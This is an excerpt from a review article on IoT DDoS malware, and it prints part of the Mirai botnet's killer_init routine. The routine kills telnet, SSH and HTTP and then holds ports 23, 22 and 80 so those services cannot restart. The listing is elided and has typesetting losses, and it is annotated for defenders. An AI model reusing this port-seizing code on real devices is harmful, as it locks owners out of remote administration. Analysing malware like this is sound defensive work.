Review Article
DDoS-Capable IoT Malwares: Comparative Analysis and Mirai Investigation
Listing 6
Mirai's killer routine terminates the telnet, SSH, and HTTP services and prevents them from restarting by binding and listening on their ports (23, 22, and 80) itself.
// root/mirai/bot/killer.c
/*
 * killer_init -- excerpt as printed in the article; "// …" marks code the
 * article elided, so this is not the complete function.
 *
 * What the visible lines do, once each for TCP ports 23 (telnet), 22 (SSH)
 * and 80 (HTTP):
 *   1. killer_kill_by_port(htons(port)) is called; its definition is not
 *      shown here, and the branch taken on its result is elided.
 *   2. tmp_bind_addr.sin_port is set to the same port.
 *   3. A TCP socket is created, bound to tmp_bind_addr and put into the
 *      listening state with a backlog of 1.
 * Holding the port is what keeps the legitimate daemon from restarting: its
 * own bind() on that port will fail while this socket exists.
 *
 * Points a defender can take from the excerpt:
 *   - The results of bind() and listen() are not checked, so a failed bind
 *     passes silently and the port stays free.
 *   - tmp_bind_fd is reassigned for each port and no close() is visible, so
 *     all three sockets presumably stay open for the life of the process --
 *     confirm against the elided code.
 *   - No accept() is visible; a listener on 23/22/80 that is owned by a
 *     process other than the expected daemon is the observable host-side
 *     sign of this routine. It also cuts off the device's normal remote
 *     administration paths.
 *
 * NOTE(review): the printed listing has no braces, the cast reads
 * "(struct sockaddr )" without a "*", and "−1" uses a typographic minus
 * (U+2212); these look like typesetting losses. The code below is left as
 * printed. The bind()/listen() pair presumably forms the body of the
 * socket() check -- confirm against the original file.
 */
void killer_init(void)
    // …
    // Kill telnet service and prevent it from restarting
    if (killer_kill_by_port(htons(23))) //…
    tmp_bind_addr.sin_port = htons(23);
    // Take over port 23 so that nothing else can bind it.
    if ((tmp_bind_fd = socket(AF_INET, SOCK_STREAM, 0)) != −1)
        bind(tmp_bind_fd, (struct sockaddr ) &tmp_bind_addr, sizeof (struct sockaddr_in));
        listen(tmp_bind_fd, 1);

    // …
    // Kill SSH service and prevent it from restarting
    if (killer_kill_by_port(htons(22))) //…
    tmp_bind_addr.sin_port = htons(22);
    // Same take-over for port 22; tmp_bind_fd is overwritten here.
    if ((tmp_bind_fd = socket(AF_INET, SOCK_STREAM, 0)) != −1)
        bind(tmp_bind_fd, (struct sockaddr ) & tmp_bind_addr, sizeof (struct sockaddr_in));
        listen(tmp_bind_fd, 1);

    // …
    // Kill HTTP service and prevent it from restarting
    if (killer_kill_by_port(htons(80))) //…
    tmp_bind_addr.sin_port = htons(80);
    // Same take-over for port 80.
    if ((tmp_bind_fd = socket(AF_INET, SOCK_STREAM, 0)) != −1)
        bind(tmp_bind_fd, (struct sockaddr ) & tmp_bind_addr, sizeof (struct sockaddr_in));
        listen(tmp_bind_fd, 1);

    // …